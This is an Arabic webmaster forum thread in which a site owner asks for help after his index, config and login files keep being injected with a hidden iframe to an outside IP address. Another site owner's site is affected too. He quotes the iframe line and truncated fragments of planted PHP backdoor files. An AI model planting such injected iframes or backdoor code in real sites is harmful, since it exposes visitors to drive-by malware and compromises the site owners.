النتائج 1 إلى 10 من 10

الموضوع: الرجاء المساعدة : ما السبب في تغيير صفحات الاندكس ؟؟

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234

    الرجاء المساعدة : ما السبب في تغيير صفحات الاندكس ؟؟



    السلام عليكم

    تعرض احد الاخوة لمشكلة بموقعه وهي اختراق ، ولكن كل ما فعله المخترق هو تغيير اي صفحة اندكس index php او html حيث يقوم بزرع امر ifreame لموقع خارجي عبارة عن ip داخل كل ملف او عدة اوامر !

    كود:
    <iframe src='http://81.95.145.240/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
    لماذا يحصل هذا الموضوع وما هي طرق الحماية منه مع الشكر





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك


  2. #2
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    الرجاء المساعدة
    كل ما حذف الكود المذكور رجع مرة اخرى !
    ما المشكلة وما الحل مع هذه المصيبة؟





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  3. #3
    عضو نشيط
    تاريخ التسجيل
    Jun 2005
    المشاركات
    103


    ظهرت هذه المشكله بهاك الاهداءات

    ما ادري هل المشكله بمنتدى او صفحات عاديه

    اذا بمنتدى اضف iframe للكلمات الممنوعه وابحث عن ثغره الاهداءات بترايدنت حصلت معي بالسابق ووجدت الحل هناك






  4. #4
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    اهلا اخي الكريم
    للاسف لا يوجد لدي هاك الاهداءات
    المصيبة الكبرى حصلت الآن وانا ادخل سيرفر زميلي وادخل موقعه
    ثم بعد ذلك دخلت سيرفر موقعي ووجدت ان ملفات الموقع تلغمت بهذا الكود
    يعني انتقلت العدوى
    قرأت منذ قليل موضوع بعد البحث لاحد الاخوة
    http://www.swalif.net/softs/swalif54/softs182966/
    وذكر فيه انه هذا فيروس!
    وللاسف لا موقعي ولا موقع زميلي لدينا الشل حتى ننفذ أمر البحث عن الفيروس وحذفه
    ما الحل يا اخوان ، المشكلة كبرت !؟





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  5. #5
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    هذا الكود يتعبث ويحشر انفه في ملفات index بكافة انواعها
    html
    php
    htm
    shtml

    وحتى دخل ملفات مثل config.php و auth.php وlogin.php

    ويزرع الكود بعد body او بعد تقفيلة html او في ملفات php اسفل الملف !!

    !!

    وش هالمصايب اللي قاعدة تهل !





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  6. #6
    عضو نشيط جدا
    تاريخ التسجيل
    May 2007
    المشاركات
    378


    اعتقد انه اخراق سيرفر كامل

    لانه في ثغرة بتغير كل صفحة اسمها index وباى امتداد وبتكون على السيرفر كله

    راسل الشركة المستضيفة وهيفيدوك اكتر من سؤالك هنا





    __________________
    Ahmed Hassan

    Web.Serve

  7. #7
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    مرحبا
    اخي الكريم كانت المشكلة عند زميلي ، ما علاقة ملفات موقعي تتضرر ؟؟؟!!
    الآن ملفات موقعين من مواقعي اصبحت ملغمة بهذا الكود والغريب ان كل موقع في سيرفر مستقل!!

    هو فيروس اكيد لكن كيف وصل لموقعي ؟
    هل عن طريق فتح صفحات موقع زميلي وبالتالي اصيب جهازي بهذا الفيروس ومن ثم انتقل لمواقعي عندما افتحها بالافتي بي ؟
    كيف انظف الموقع بدون تفعيل الشل ؟
    هل توجد طريقة؟
    افيدوني ولكم الأجر





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  8. #8
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    ما فيه حل يا اخوان ؟؟

    اليوم الصباح وبعد أن حذفت أغلب برامج الموقع ولم يبقى الا برنامجين فقط وقمت بتنظيف ملفاتهما تماما لافاجأ قبل قليل ان كود الآي فريم مزروع في ملفاتهما !!
    على قولة اخواننا المصريين: برج من دماغي حيطير!
    حتى اني انشأت مجلدين جديدين للتجربة ووضعت في كل منهما ملفي index نوع html وآخر php وكلاهما فارغان ولم يسلما من زرع هذا الكود اللعين !!

    ارجو المساعدة يا اخوان ، المسألة مهمة





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  9. #9
    عضو نشيط
    تاريخ التسجيل
    Feb 2003
    المشاركات
    234


    ايضا وجدت ملفات php لا علاقة لها بالموقع مزروعة في اكثر من مجلد

    يوجد بها كود غريب يتعلق على هذا الشكل

    error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] :

    وهذا

    if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_on

    وللمعلومية فقد قمت بحذف كل هذه الملفات قبل أن يعود ويزرع الكود مرة اخرى !


    والله وجع راس !

    الرجاء التعاون





    __________________
    إستخدم ملفك الخاص لكتابة توقيعك

  10. #10
    عضو جديد
    تاريخ التسجيل
    Aug 2007
    المشاركات
    11





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا|شقق للايجار في الكويت | بيوت للبيع في الكويت | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض